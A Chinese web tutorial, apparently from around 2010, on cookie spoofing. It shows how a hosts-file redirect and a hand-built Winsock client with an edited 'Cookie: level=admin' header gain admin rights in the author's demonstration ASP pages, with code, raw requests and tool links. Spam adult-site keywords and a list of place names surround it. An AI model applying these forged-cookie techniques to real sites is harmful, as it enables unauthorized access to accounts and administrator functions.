成人午夜激情影院,小视频免费在线观看,国产精品夜夜嗨,欧美日韩精品一区二区在线播放

[粗]cookie欺騙教程

2010-08-28 10:46:32來源:西部e網(wǎng)作者:

    首先大家明白什么是COOKIE,具體點說如果是98那么它們默認存放在C:\windows\cookies 目錄下,如果是2k它們在C:\Documents and Settings\%你的用戶名%\Cookies目錄下(每個文件都不會超過4KB)
 它們的文件名格式為:你的用戶名@產(chǎn)生的COOKIE的網(wǎng)頁文件所在的WEB目錄[COOKIE改變的次數(shù)].txt
 具體的例子:iwam_system@cookie[3].txt
 再來看一看一個最簡單的COOKIE文件的內(nèi)容:
 level
admin
www.locking.8u8.com/cookie/
0
1331699712
29536653
4044081984
29528196
*
 
 最前面的兩段為服務器產(chǎn)生的COOKIE內(nèi)容(level和admin)第三段為產(chǎn)生這個COOKIE文件的網(wǎng)站的域名和WEB目錄
這兒就要注意了沒有記錄產(chǎn)生COOKIE文件的文件名!所以在同一個目錄下不同文件產(chǎn)生的COOKIE是同一個文件只是每
產(chǎn)生一次COOKIE的文件名的中括號里的數(shù)字就要加1,后面的那些就不管它了我也不懂哈:)
 
    再來看看如何生成一個COOKIE我以vbs cript為例:

<s cript language=vbs>
document.cookie="level" & "=" & "user" & ";expires=Monday, 01-Jan-03 12:00:00 GMT"
msgbox document.cookie
</s cript>

  這兒我們特別人注意的是最后一段 ";expires=Monday, 01-Jan-03 12:00:00 GMT"這是用來說明產(chǎn)生的COOKIE文件的
有效時間的,如果沒有那么這個COOKIE你將不會在本文開頭所說的目錄里找到它。這個例子中有效時間是2003年當然你

    也就能在本地硬盤上找到它們了。 

  另外當用document.cookie來得到COOKIE內(nèi)容時設(shè)置COOKIE有效時間這一段將被忽略(當然這也方便了網(wǎng)站的COOKIE

*作)比如說上面將彈出一個內(nèi)容為level=user的對話框

好了現(xiàn)在我們來實戰(zhàn)一下:

我的網(wǎng)站叫www.locking.8u8.com在它的COOKIE目錄里有兩個文件一個是admin1.htm內(nèi)容就是上面的例子
還有一個文件叫l(wèi)evel1.htm內(nèi)容如下:
<s cript language=vbs>
co=document.cookie
le=mid(co,instr(co,"=")+1,len(co)-instr(co,"=")+1)
if le="user" then
msgbox "you are a user"
else
 if le="admin" then
msgbox "you are a administrator"
 else
msgbox "you not login"
 end if
end if
</s cript>

當你先瀏覽admin1.htm后再瀏覽level1.htm時將彈出一個對話框內(nèi)容為:"you are a user",當你沒有瀏覽過
admin1.htm而直接瀏覽level1.htm將說 "you not login" (注意有的人可能會先瀏覽admin1.htm后再直接在硬盤
上更改COOKIE的內(nèi)容當然這樣是不行的)
 
  好了我們的目標就是讓我們能在瀏覽level1時彈個框框說 "you are a administrator" :)
  辦法只有兩個咯:1)把8u8黑了,然后找到那個level1.htm改了不就可以了不過本篇文章不做討論哈
  2)進行COOKIE欺騙,OK LET GO:)

-----------------------------------(我的系統(tǒng)環(huán)境一臺2kserver+iis5)
第一步:自已做一個文件名叫admin2.htm吧內(nèi)容如下
<s cript language=vbs>
document.cookie="level" & "=" & "admin" & ";expires=Monday, 01-Jan-03 12:00:00 GMT"
</s cript>
然后把它放入一個名叫COOKIE的可瀏覽目錄中(COOKIE要位于根目錄)

第二步:找到位于C:\WINNT\system32\drivers\etc下的hosts文件在它的后面加上如下一段:

127.0.0.1 www.locking.8u8.com

第三步:仿問www.locking.8u8.com/cookie/admin2.htm(這兒實際是仿問的本機的文件)

第四步:刪除hosts中剛才我們添加的內(nèi)容然后再清掉IE的歷史記錄

第五步:讓我們再次仿問www.locking.8u8.com/cookie/level1.htm

  怎么樣我們現(xiàn)在是 administrator了吧(注意仿問網(wǎng)站是一定要在前面加三個w)


COOKIE欺騙教程2
 
 ------------- 利用winsocket編程發(fā)送偽造COOKIE

  在上一節(jié)中我所舉的例子是一個存活期很長的COOKIE,對于這種
COOKIE他會生成在我們的本地盤上的,而對于那些關(guān)閉瀏覽器就失效
的COOKIE我們該怎樣來進行欺騙偽造呢?
  首先我們應該知道在我第一節(jié)的例子中彈那個"you are a administrator"
框框的網(wǎng)頁(level1.htm)其實是下載在我的本地然后執(zhí)行的,也就是說
他對COOKIE的檢驗讀取也是在本地,那如果是在遠程服務器上呢?比如
一個ASP程序他又是如何讀取我們的COOKIE的呢?
  先來看看基本的東東吧:當我們使用HTTP協(xié)議向遠程主機發(fā)送一個
GET或是POST請求時,那么如果有這個域名的COOKIE存在(不管是在內(nèi)存中
還是本地盤上的)都將和請求一起發(fā)送到服務器去.

下面的就是一個實際的例子:

GET /ring/admin.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive
Cookie: level=user; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM

看到最后一行了吧:)

  然后我們再來看看服務器是如何進行COOKIE檢驗的,我舉了一個簡單的例子:
有兩個ASP文件一個叫admin.asp,還有一個叫l(wèi)evel.asp

-----------admin.asp------------------
<%response.write now()%>
<%response.write "<br>"%>
<%response.cookies("level")="user"%>
<%response.write "<html><s cript>document.write(document.cookie);</s cript></html>"%>

-----------cut here-------------------

-----------level.asp------------------
<%
ifRequest.Cookies("level")<>"" then
response.write "<html><s cript>document.write(document.cookie);</s cript></html>"
 if request.cookies("level")="user" then
response.write "<html><s cript>alert(<|>you are a user<|>);</s cript></html>"
 else
  if request.cookies("level")="admin" then
response.write "<html><s cript>alert(<|>you are administrator!<|>);</s cript></html>"
set fso1=server.createobject("s cripting.filesystemobject")
set fil=fso1.opentextfile("d:\sms\ring\a.txt",8,true)
fil.writeline "you are admin!"
  end if
 end if
else
response.write "<html><s cript>alert(<|>you are not login<|>);</s cript></html>"
end if
%>
-----------cut here-------------------

  說明:當你請求admin.asp時,將產(chǎn)生一個臨時的COOKIE(你關(guān)閉瀏覽器就會失效),然后我們不關(guān)閉瀏覽器而
請求level.asp時它就會用request.cookies來提取你發(fā)出的請求里面的cookie,如果你的COOKIE里面的內(nèi)容是
admin的話那么它將用fso對象在服務器產(chǎn)生一個記錄文件(a.txt要注意的是我們在實驗時要把目錄設(shè)為可寫)

  好了就介紹這么多吧,我們的目的就是讓服務器產(chǎn)生a.txt并寫入內(nèi)容"you are admin"還是進行上一節(jié)的
域名欺騙嗎?不是讓我們寫一個winsocket程序吧,Let GO:)

 下面是我們VB+WINSCOKET控件寫的一個簡單的例子的源代碼:

-----------------------COOKIE SEND---------------------------------------
  Private Sub Command1_Click()
Winsock1.RemotePort = Text3.Text<|>遠程主機打開的端口一般都為80
Winsock1.RemoteHost = Text2.Text<|>遠程主機的域名也可以輸IP
Winsock1.Connect<|>打開一個SOCKET連接
Command1.Enabled = False<|>一次只能打開一個連接所以要讓SEND按鈕失效
End Sub

Private Sub winsock1_Connect()
 Winsock1.SendData Text1.Text <|>打開連接成功的話就發(fā)送數(shù)據(jù)
End Sub

Private Sub Command2_Click()
Winsock1.Close
Command1.Enabled = True <|>關(guān)閉連接,讓SEND按鈕有效
End Sub


Private Sub winsock1_DataArrival(ByVal bytesTotal As Long)<|>接收數(shù)據(jù),可以讓我們檢查數(shù)據(jù)是否發(fā)送成功
Dim tmpstr As String
Winsock1.GetData tmpstr
Text4.Text = tmpstr
End Sub

-----------------------CUT HERE--------------------------------------------

 好,再讓我們看一看具體的過程吧:這兒要用到一個不錯的程序WinSock Expert v0.3 beta 1

一步:打開一個IE然后再打開winsock expert選擇監(jiān)視剛才打開的IE窗口的數(shù)據(jù)包
二步: 在IE地址欄輸http://61.139.xx.xx/ring/admin.asp,那個我將看到發(fā)出了如下數(shù)據(jù)

GET /ring/admin.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive

 不要半閉窗口請http://61.139.xx.xx/ring/level.asp,我們又將看到發(fā)出了如下數(shù)據(jù)

GET /ring/level.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive
Cookie: level=user; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM

三步: 好了對第二次發(fā)出的數(shù)據(jù)的最后一行Cookie: level=user; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM
就是我們要改的東東,由于level.asp中相應的COOKIE的檢驗語句為if request.cookies("level")="admin" then
所以我們只要把上面的數(shù)據(jù)的最后一行改成Cookie: level=admin; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM
就可以了,后面的東東很重要下面我再說明一下:)

四步: 把改過的數(shù)據(jù)拷到我編的程序的發(fā)送框里面輸入端口和域名后。。。。。

五步:到服務器看看是不是生成了那個a.txt里面的內(nèi)容為"you are admin!


好了不寫了,主要還是自已多實驗就可以了為了放便大家本文章的程序代碼完全公開哈

1.admin.asp和level.asp: http://locking.8u8.com/cookie/admin.txt和level.txt
2.cookieclient.exe及源代碼: http://locking.8u8.com/cookie/cookiesend.zip
3.winsock expert: http://software.tom.com/download.asp?id=7500 或是 http://dxqsoft.myrice.com/

關(guān)鍵詞:WinXP

贊助商鏈接:

主站蜘蛛池模板: 乌苏市| 井陉县| 金塔县| 桐柏县| 石景山区| 巴青县| 广宗县| 东乡族自治县| 镇安县| 鄂托克旗| 正蓝旗| 塘沽区| 璧山县| 溧阳市| 舒兰市| 北碚区| 集安市| 内乡县| 盐津县| 镇江市| 绥阳县| 东乌珠穆沁旗| 无极县| 三门县| 霍山县| 云霄县| 偏关县| 永康市| 武夷山市| 金平| 靖边县| 五莲县| 淳安县| 阜城县| 九龙县| 南开区| 安庆市| 莱西市| 北海市| 巴中市| 巨鹿县|